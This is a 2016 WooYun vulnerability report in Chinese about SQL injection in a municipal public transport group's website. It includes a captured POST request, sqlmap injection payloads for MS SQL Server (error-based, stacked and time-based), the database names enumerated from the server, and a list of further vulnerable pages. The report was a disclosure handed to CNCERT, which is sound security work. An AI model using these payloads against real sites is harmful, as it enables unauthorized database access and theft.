某市公共交通集团注入一枚 | wooyun-2016-0169491| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169491

漏洞标题：某市公共交通集团注入一枚

漏洞作者：路人甲

提交时间：2016-01-20 00:50

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-20：细节已通知厂商并且等待厂商处理中
2016-01-22：厂商已经确认，细节仅向厂商公开
2016-02-01：细节向核心白帽子及相关领域专家公开
2016-02-11：细节向普通白帽子公开
2016-02-21：细节向实习白帽子公开
2016-03-06：细节向公众公开

简要描述：

详细说明：

1 burp抓包
POST /cczn/query.asp HTTP/1.1
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Cookie: TklSys=ResourceList%5FCurrentPage=1&ResourceList%5FParent=20&ResourceList%5FWorkType=; ASPSESSIONIDCQDRBQRR=FECBMBMAIMILEKPLNEAKCGAK; isvoted=voteid2=2; Tsys%5FComment=Email=sample%40email%2Etst&Title=Mr%2E
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=123&optMuDiZhan=1&Submit=%c8%b7%b6%a8
optChuFaZhan参数存在注入

漏洞证明：

#2 注入验证
[21:58:44] [WARNING] if UNION based SQL injection is not detected, please consi
er forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'optChuFaZhan' is vulnerable. Do you want to keep testing the ot
ers (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 228 HTTP(s)
equests:
---
Parameter: optChuFaZhan (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHA
(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END)
+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan
1&Submit=%c8%b7%b6%a8
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c
%b7%b6%a8
---
[21:58:50] [INFO] testing Microsoft SQL Server
[21:58:50] [INFO] confirming Microsoft SQL Server
[21:58:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[21:58:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 223 times



#3 列表
[22:00:52] [INFO] parsing HTTP request from 'ty.txt'
[22:00:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:00:53] [INFO] testing connection to the target URL
[22:00:53] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: optChuFaZhan (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR
(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))
+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=
1&Submit=%c8%b7%b6%a8
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8
%b7%b6%a8
---
[22:00:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[22:00:53] [INFO] fetching database names
[22:00:53] [INFO] the SQL query used returns 25 entries
[22:00:53] [INFO] retrieved: bak2010
[22:00:53] [INFO] retrieved: bak2011
[22:00:53] [INFO] retrieved: bike
[22:00:54] [INFO] retrieved: cnh1001_db
[22:00:54] [INFO] retrieved: database2
[22:00:54] [INFO] retrieved: dicuz
[22:00:54] [INFO] retrieved: ERP
[22:00:54] [INFO] retrieved: gjmis_system
[22:00:54] [INFO] retrieved: gjmis2011
[22:00:55] [INFO] retrieved: gjmis2012
[22:00:55] [INFO] retrieved: gjmis2013
[22:00:55] [INFO] retrieved: gjmisth2007
[22:00:55] [INFO] retrieved: GJOA
[22:00:55] [INFO] retrieved: GJWY
[22:00:55] [INFO] retrieved: ick
[22:00:55] [INFO] retrieved: kefu
[22:00:56] [INFO] retrieved: master
[22:00:56] [INFO] retrieved: model
[22:00:56] [INFO] retrieved: msdb
[22:00:56] [INFO] retrieved: ReportServer
[22:00:56] [INFO] retrieved: ReportServerTempDB
[22:00:56] [INFO] retrieved: tempdb
[22:00:56] [INFO] retrieved: test
[22:00:56] [INFO] retrieved: webtest
[22:00:57] [INFO] retrieved: YCZ
available databases [25]:
[*] bak2010
[*] bak2011
[*] bike
[*] cnh1001_db
[*] database2
[*] dicuz
[*] ERP
[*] gjmis2011
[*] gjmis2012
[*] gjmis2013
[*] gjmis_system
[*] gjmisth2007
[*] GJOA
[*] GJWY
[*] ick
[*] kefu
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] webtest
[*] YCZ





#4 多个页面存在post注入 ，就不一一截图了
**.**.**.**/more.asp
**.**.**.**/more2.asp
**.**.**.**/more3.asp
**.**.**.**/more4.asp
**.**.**.**/more7.asp
**.**.**.** /more9.asp
**.**.**.** /more_fz.asp
**.**.**.** /more_ygfc.asp

修复方案：

抓紧补吧

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-01-22 10:58

厂商回复：

CNVD确认未复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169491

漏洞标题：某市公共交通集团注入一枚

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2016-01-20 00:50

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169491

漏洞标题：某市公共交通集团注入一枚

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2016-01-20 00:50

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0169491"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云